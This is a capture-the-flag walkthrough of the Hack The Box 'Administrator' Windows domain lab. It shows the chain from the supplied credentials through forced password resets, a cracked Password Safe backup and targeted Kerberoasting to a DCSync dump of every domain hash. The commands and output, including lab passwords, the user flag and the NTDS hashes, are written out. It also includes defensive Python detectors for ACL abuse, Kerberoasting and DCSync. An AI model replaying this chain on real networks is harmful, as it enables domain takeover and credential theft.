htb-Administrator

As is common in real-life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia, Password: ichliebedich

nmap -sCV -A -T4 -Pn 10.10.11.42

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 15:42 CST
Nmap scan report for 10.10.11.42
Host is up (0.62s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-14 14:42:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=12/14%OT=21%CT=1%CU=42122%PV=Y%DS=2%DC=T%G=Y%TM=675
OS:D375F%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=I%CI=RD%II=I%TS=
OS:A)SEQ(SP=107%GCD=1%ISR=108%TI=RD%CI=I%II=I%TS=A)SEQ(SP=107%GCD=1%ISR=108
OS:%TI=RD%CI=RD%II=I%TS=C)OPS(O1=M53ANW8ST11%O2=M53ANW8ST11%O3=M53ANW8NNT11
OS:%O4=M53ANW8ST11%O5=M53ANW8ST11%O6=M53AST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W
OS:4=FFFF%W5=FFFF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53ANW8NNS%CC=Y%Q=)T1(
OS:R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=
OS:%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W
OS:=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S
OS:+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUC
OS:K=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m04s
| smb2-time:
| date: 2024-12-14T14:44:08
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 768.22 ms 10.10.16.1
2 359.07 ms 10.10.11.42

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.19 seconds

FTP login attempt failed

SMB enumeration

SMB is a network file-sharing protocol that lets applications read and write files, request services from remote hosts, and perform other network operations.

Using the supplied credentials, enumerate the SMB service with CrackMapExec to verify that the credentials are valid and to check whether any useful shares exist.

CrackMapExec is a widely used penetration-testing tool for enumerating and exploiting Windows networks. It is particularly suited to large-scale scanning, authentication, command execution and share enumeration against SMB, RDP and WinRM.

The result shows that Olivia's SMB login is valid but exposes no useful shares; only the standard NETLOGON and SYSVOL shares are readable.

crackmapexec smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares

WinRM login as Olivia

WinRM is Microsoft's remote management protocol. It allows remote command execution, process launching and system configuration, much like SSH on Unix systems.

Using CrackMapExec to check the target's WinRM service (port 5985) shows that the credentials are valid and the login succeeds.

The result indicates that remote access can be obtained over WinRM.

crackmapexec winrm 10.10.11.42 -u 'Olivia' -p 'ichliebedich'

Log in with evil-winrm to get a shell and gather information about the host's privileges and users, then run whoami /all to view the user's privileges.

evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'

┌──(root㉿kali)-[~]
└─# evil-winrm -i 10.10.11.42 -u 'Olivia' -p 'ichliebedich'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami /all

USER INFORMATION
----------------

User Name SID
==================== ============================================
administrator\olivia S-1-5-21-1088858960-373806567-254189436-1108


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\olivia\Documents>

The output shows that Olivia has only basic user rights, plus SeMachineAccountPrivilege, which lets her add computer accounts to the domain.

Domain user enumeration

Once logged in to the target, enumerate the domain's users with net user; this lists every user account on the domain controller.

*Evil-WinRM* PS C:\Users\olivia\Documents> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator alexander benjamin
emily emma ethan
Guest krbtgt michael
olivia
The command completed with one or more errors.

olivia is the current user; the rest are other users in the domain.

Gaining privileges

Extracting domain information with BloodHound

Use bloodhound.py to collect information from the domain.

BloodHound download: https://github.com/BloodHoundAD/BloodHound/releases

┌──(root㉿kali)-[~/BloodHound-linux-x64]
└─# bloodhound-python -d administrator.htb -ns 10.10.11.42 -u 'Olivia' -p ichliebedich -c All --zip
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: unpack requires a buffer of 4 bytes
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.42:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 14S
INFO: Compressing output into 20241214163637_bloodhound.zip

Running this command produces the archive 20241214163637_bloodhound.zip, which contains all the key information about the domain.

Next, start the database with sudo neo4j start and launch the BloodHound client with the bloodhound command. Drag the zip archive into BloodHound to upload it. Account: neo4j, password: 123456.

Our current user is Olivia, so look at her node: search for Olivia in the top-left. olivia has a First Degree Object Control entry (abbreviated FDOC from here on); clicking it shows that olivia holds GenericAll over the user michael.

Lateral movement

Olivia->michael

GenericAll is equivalent to Full Control: olivia can do anything to the michael account, including changing its password and group memberships.
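As an added illustration (not part of this writeup, and not BloodHound's own code), the Python below does the check a defender would run before an attacker does: it walks a list of ACEs, flags the control rights this box chains together (GenericAll, GenericWrite, ForceChangePassword, plus WriteDacl/WriteOwner) when held by a non-admin principal, and follows them outward from a start account the way BloodHound draws a path. The record format, the trusted-principal list and the sample ACEs are constructed assumptions; a real run would feed it ACEs exported from the domain.

```python
"""Flag abusable Active Directory control rights in an exported ACE list.

Added example, not part of the original writeup. It assumes a simplified
record format (constructed here) similar to what BloodHound exports: one
dict per ACE with the principal that holds the right, the target object
and the right name.
"""
from collections import defaultdict

# Rights that let a non-admin principal take over a user account, with the
# remediation a defender would apply for each.
ABUSABLE_RIGHTS = {
    "GenericAll": "remove ACE; full control of the account",
    "GenericWrite": "remove ACE; allows attribute writes such as adding an SPN",
    "ForceChangePassword": "remove ACE; allows a password reset without the old one",
    "WriteDacl": "remove ACE; holder can grant itself any other right",
    "WriteOwner": "remove ACE; holder can take ownership and then WriteDacl",
}

# Principals that legitimately hold broad rights (constructed assumption);
# any other holder of an abusable right is a finding.
TRUSTED_PRINCIPALS = {"DOMAIN ADMINS", "ENTERPRISE ADMINS", "SYSTEM"}

# Constructed sample reflecting the edges described in the writeup.
SAMPLE_ACES = [
    {"principal": "OLIVIA", "target": "MICHAEL", "right": "GenericAll"},
    {"principal": "MICHAEL", "target": "BENJAMIN", "right": "ForceChangePassword"},
    {"principal": "EMILY", "target": "ETHAN", "right": "GenericWrite"},
    {"principal": "DOMAIN ADMINS", "target": "ETHAN", "right": "GenericAll"},
    {"principal": "EMMA", "target": "ALEXANDER", "right": "ReadProperty"},
]


def find_risky_aces(aces):
    """Return the ACEs whose right is abusable and whose holder is not trusted."""
    findings = []
    for ace in aces:
        right = ace["right"]
        if right in ABUSABLE_RIGHTS and ace["principal"].upper() not in TRUSTED_PRINCIPALS:
            findings.append({**ace, "remediation": ABUSABLE_RIGHTS[right]})
    return findings


def control_chains(aces, start):
    """Return every account reachable from `start` over risky ACEs.

    Breadth-first walk over the risky edges only, in discovery order; this
    is the same path BloodHound shows as a chain of FDOC edges.
    """
    edges = defaultdict(list)
    for ace in find_risky_aces(aces):
        edges[ace["principal"].upper()].append(ace["target"].upper())
    reached, queue = [], [start.upper()]
    while queue:
        node = queue.pop(0)
        for nxt in edges[node]:
            if nxt not in reached:
                reached.append(nxt)
                queue.append(nxt)
    return reached


if __name__ == "__main__":
    for f in find_risky_aces(SAMPLE_ACES):
        print(f"{f['principal']} -> {f['target']} [{f['right']}]: {f['remediation']}")
    print("reachable from OLIVIA:", control_chains(SAMPLE_ACES, "OLIVIA"))
```

On the sample data the script reports three findings and shows that from olivia the chain reaches michael and then benjamin, which is exactly the path this section follows; each finding carries the ACE that should be removed.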

Logged in as olivia through evil-winrm, change the domain user michael's password to michael:

*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael michael /domain 
The command completed successfully.

The login succeeds; the michael account is ours.

┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'michael' -p 'michael'
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael

michael->benjamin

ForceChangePassword

Open BloodHound and look at michael: this user also has an FDOC, with ForceChangePassword over benjamin, meaning michael can forcibly reset benjamin's password.

FTP login as benjamin

In BloodHound, benjamin holds no control rights of his own, but he is a member of the Share Moderators group, so an FTP login is worth trying.

Next, use the michael account to reset benjamin's password (either with bloodyAD or with rpcclient; reference: https://www.secrss.com/articles/48320), then log in over FTP as benjamin.

benjamin->emily

bloodyAD -u "michael" -p "michael" -d "Administrator.htb" --host "10.10.11.42" set password "benjamin" "12345678"
┌──(root㉿kali)-[/HTB/Administrator]
└─# rpcclient -U michael 10.10.11.42
Password for [WORKGROUP\michael]:
rpcclient $> setuserinfo2 benjamin 23 'benjamin'
rpcclient $> exit

┌──(root㉿kali)-[~/BloodHound-linux-x64]
└─# ftp benjamin@10.10.11.42
Connected to 10.10.11.42.
220 Microsoft FTP Service
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.

After logging in over FTP, list the files in the current directory: there is a backup file, Backup.psafe3. Download it.

ftp> dir
ftp> binary # switch to binary mode for the file transfer
200 Type set to I.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||51246|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************************| 952 0.77 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:01 (0.77 KiB/s)

The file is saved in whichever directory the terminal was opened in.

A .psafe3 file is an encrypted Password Safe database.

It cannot be read directly; extract a crackable hash from it with pwsafe2john, which ships with Kali.

┌──(root㉿kali)-[/home/kali/Administrator]
└─# pwsafe2john Backup.psafe3
Backu:$pwsafe$*3*4ff588b74906263ad2abba592aba35d58bcd3a57e307bf79c8479dec6b3149aa*2048*1a941c10167252410ae04b7b43753aaedb4ec63e3f18c646bb084ec4f0944050

With the hash extracted, try to crack it.

┌──(root㉿kali)-[/home/kali/Administrator]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho (Backu)
1g 0:00:00:00 DONE (2024-12-05 23:24) 4.761g/s 29257p/s 29257c/s 29257C/s newzealand..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Open the database with the Password Safe client on the local machine; it contains the following entries:

alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw
emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur

This gives emily's password: UXLCI5iETUsIBoFVTj8yQFKoHjXmb

Log in as emily with evil-winrm.

┌──(root㉿kali)-[/HTB/Administrator]
└─# evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily

The emily account is ours. Go to the Desktop directory to grab the first flag.

*Evil-WinRM* PS C:\Users\emily\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> dir

Directory: C:\Users\emily\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar--- 12/7/2024 12:20 AM 34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
888ac3b3d60b08fa502ca90c9e90d506

emily->ethan

Checking BloodHound again, emily has an FDOC with GenericWrite over the user ethan.

In an Active Directory (AD) environment, GenericWrite is a right that lets an attacker modify attributes of the target account.

A short introduction to Kerberoasting:

When handling authentication, the Kerberos protocol lets any domain user request a service ticket for an account that has an SPN (Service Principal Name, the unique name identifying a service instance).

These tickets are usually encrypted with the account's NTLM hash, so as long as a domain account has an SPN registered, an attacker can request its service ticket through Kerberos and extract it. The attacker can then crack the service ticket offline (for example with PowerView or GetUserSPNs.py) to indirectly recover the target account's password.

Here, however, ethan has no SPN registered, so the only option is to use GenericWrite to create an SPN on the ethan account, then request a ticket and crack it with targetedKerberoast.py.

targetedKerberoast.py download: https://github.com/ShutdownRepo/targetedKerberoast
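From the defender's side, the sequence just described (an SPN written onto a user account, then an RC4 service-ticket request for that same account) is detectable in the domain controller's Security log. The Python below is an added example, not part of this writeup or of targetedKerberoast; it assumes events already parsed into dicts using the standard field names of event 5136 (directory object modified, which requires the "Audit Directory Service Changes" subcategory and a SACL on the user objects) and event 4769 (Kerberos service ticket requested). The sample events, timestamps and addresses are constructed.

```python
"""Detect targeted Kerberoasting from Windows Security-log events.

Added example, not from the original writeup. Correlates an SPN write on a
user account (5136, attribute servicePrincipalName) with a later service
ticket request for that account using RC4 (4769, TicketEncryptionType
0x17). Input is a constructed list of dicts; a real deployment would feed
it events from a SIEM or Windows event forwarding.
"""
from datetime import datetime, timedelta

RC4_HMAC = "0x17"            # etype 23, the one offline cracking targets
WINDOW = timedelta(minutes=30)  # how long after an SPN write a request is suspicious

# Constructed sample events using the Security-log field names.
SAMPLE_EVENTS = [
    {"id": 5136, "time": "2024-12-15T02:30:00", "SubjectUserName": "emily",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": "Value Added"},
    {"id": 4769, "time": "2024-12-15T02:31:10", "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.16.5"},
    # Normal traffic: AES ticket for a computer account, must not alert.
    {"id": 4769, "time": "2024-12-15T02:31:20", "TargetUserName": "olivia@ADMINISTRATOR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.16.5"},
    # RC4 ticket for a user account with no recent SPN write: weaker signal.
    {"id": 4769, "time": "2024-12-15T03:10:00", "TargetUserName": "emma@ADMINISTRATOR.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.16.9"},
]


def _cn(dn):
    """Return the leading CN of a distinguished name, lower-cased."""
    return dn.split(",")[0].split("=", 1)[1].lower()


def detect_targeted_kerberoast(events, window=WINDOW):
    """Return one alert per RC4 service-ticket request for a user account.

    severity 'high'  : the account's SPN was added within `window` before the request
    severity 'medium': plain Kerberoast signal (RC4 ticket for a non-computer account)
    """
    spn_writes = {}  # account -> (time of SPN write, who wrote it)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 5136
                and ev.get("AttributeLDAPDisplayName") == "servicePrincipalName"
                and ev.get("OperationType") == "Value Added"):
            spn_writes[_cn(ev["ObjectDN"])] = (t, ev["SubjectUserName"])
        elif ev["id"] == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC:
            svc = ev["ServiceName"].lower()
            if svc.endswith("$"):
                continue  # computer accounts have long random passwords; not roastable
            alert = {"service": svc, "requester": ev["TargetUserName"],
                     "source": ev["IpAddress"], "severity": "medium"}
            if svc in spn_writes and t - spn_writes[svc][0] <= window:
                alert["severity"] = "high"
                alert["spn_written_by"] = spn_writes[svc][1]
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(a)
```

On the sample data the write by emily followed 70 seconds later by an RC4 ticket for ethan is reported as high severity with the writer's name attached, while the ticket for svc_backup is only a medium-severity Kerberoast signal. The corresponding hardening is to remove GenericWrite from non-admin principals (the ACE BloodHound surfaced here), keep SPN accounts on long random passwords or gMSAs, and disable RC4 for service accounts so that 4769 with etype 0x17 becomes rare enough to alert on by itself.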

First sync the clock with the DC; otherwise the time skew will make the attack fail.

┌──(root㉿kali)-[~/Desktop]
└─# ntpdig 10.10.11.42
2024-12-15 02:22:47.084508 (+0800) +25206.101334 +/- 0.209603 10.10.11.42 s1 no-leap

┌──(root㉿kali)-[~/Desktop]
└─# ntpdate 10.10.11.42
2024-12-15 02:23:04.429985 (+0800) +25206.072243 +/- 0.240176 10.10.11.42 s1 no-leap
CLOCK: time stepped by 25206.072243

Create the SPN

Set-ADUser -Identity ethan -ServicePrincipalNames @{ADD="opsSPN/host"}

Roasting

┌──(root㉿kali)-[~/targetedKerberoast-main]
└─# python targetedKerberoast.py -u "emily" -p "UXLCI5iETUsIBoFVTj8yQFKoHjXmb" -d "Administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$c272d2d4f6c0ecab1c52f9c3a61a7752$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

Cracking

┌──(root㉿kali)-[/home/kali/Administrator]
└─# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit (?)
1g 0:00:00:00 DONE (2024-12-06 17:35) 100.0g/s 512000p/s 512000c/s 512000C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Ethan's password is limpbizkit.

Ethan->Administrator

Now that we have ethan's password, check his rights in BloodHound: ethan's FDOC indirectly grants him DCSync rights on the domain controller (DC).

DCSync is an attack technique that abuses the Active Directory (AD) replication mechanism. A user with DCSync rights can impersonate a domain controller and ask other DCs to replicate sensitive data such as NTLM hashes and Kerberos keys.
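Because DCSync goes through the normal replication interface, it leaves a trace: with "Audit Directory Service Access" enabled and a SACL on the domain object, every replication request logs event 4662 with the replication extended-right GUIDs in its Properties field. The Python below is an added example, not part of this writeup or of impacket; it assumes 4662 events already parsed into dicts with the Security-log field names, and the allow-list of accounts expected to replicate (the DC computer accounts) is a constructed assumption. The replication-right GUIDs themselves are the fixed, well-known schema values.

```python
"""Flag DCSync-style replication requests in Windows 4662 events.

Added example, not part of the original writeup. A DCSync replication
appears as a control-access operation (AccessMask bit 0x100) on the domain
object whose Properties list one or more replication extended rights. Any
account outside the allow-list performing such an operation is reported.
"""
import re

# Extended-right GUIDs that grant directory replication (well-known values).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit for an extended-right (control access) operation

# Accounts expected to replicate: the DC computer accounts. Constructed
# assumption for this demo; list your own DCs and any legitimate sync accounts.
ALLOWED_REPLICATORS = {"DC$"}

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.IGNORECASE)

# Constructed sample 4662 events. ObjectType GUIDs are the domainDNS and
# user schema classes; the olivia event exercises User-Force-Change-Password,
# which is not a replication right and must not alert.
SAMPLE_EVENTS = [
    {"id": 4662, "SubjectUserName": "DC$", "ObjectServer": "DS", "AccessMask": "0x100",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "SubjectUserName": "ethan", "ObjectServer": "DS", "AccessMask": "0x100",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"id": 4662, "SubjectUserName": "olivia", "ObjectServer": "DS", "AccessMask": "0x100",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "Properties": "{00299570-246d-11d0-a768-00aa006e0529}"},
    # Same GUID but not a control-access operation: constructed negative case.
    {"id": 4662, "SubjectUserName": "ethan", "ObjectServer": "DS", "AccessMask": "0x10",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def replication_rights(properties):
    """Map the GUIDs found in a 4662 Properties field to replication right names."""
    return [REPL_GUIDS[g.lower()] for g in GUID_RE.findall(properties) if g.lower() in REPL_GUIDS]


def detect_dcsync(events, allowed=ALLOWED_REPLICATORS):
    """Return one alert per replication control-access operation by a non-allowed account."""
    alerts = []
    for ev in events:
        if ev.get("id") != 4662 or ev.get("ObjectServer") != "DS":
            continue
        if (int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS) == 0:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        account = ev["SubjectUserName"]
        if account.upper() in allowed:
            continue
        alerts.append({"account": account, "rights": rights})
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {a['account']}: {', '.join(a['rights'])}")
```

On the sample data only ethan's request is reported. The preventive counterpart of this detection is the check BloodHound performed for the attacker: audit the domain object's ACL for these three extended rights and remove them from every principal that is not a domain controller or a known directory-sync account.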

Using DCSync, dump every password hash on the domain controller with impacket-secretsdump.

┌──(root㉿kali)-[~/BloodHound-linux-x64]
└─# impacket-secretsdump ethan:limpbizkit@10.10.11.42
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:e55bcd70f1b548fc4304ebd8a3f2f2f7:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:dec0f5eac8b174633aa1449c41abdd0170098d31f2c38242675c6ad80873a229
administrator.htb\michael:aes128-cts-hmac-sha1-96:4d614f91ce0d82e332d76139b19ec03b
administrator.htb\michael:des-cbc-md5:49f10d5d97f19d5d
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:e110f75337181474608f51a5b22d8198d3fa56d68633b384b7136d4496c89337
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:aa2b24ac2fb879262faa4f6ca294f332
administrator.htb\benjamin:des-cbc-md5:1a4f0bce2343cebf
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

With the Administrator hash in hand, log in with evil-winrm.

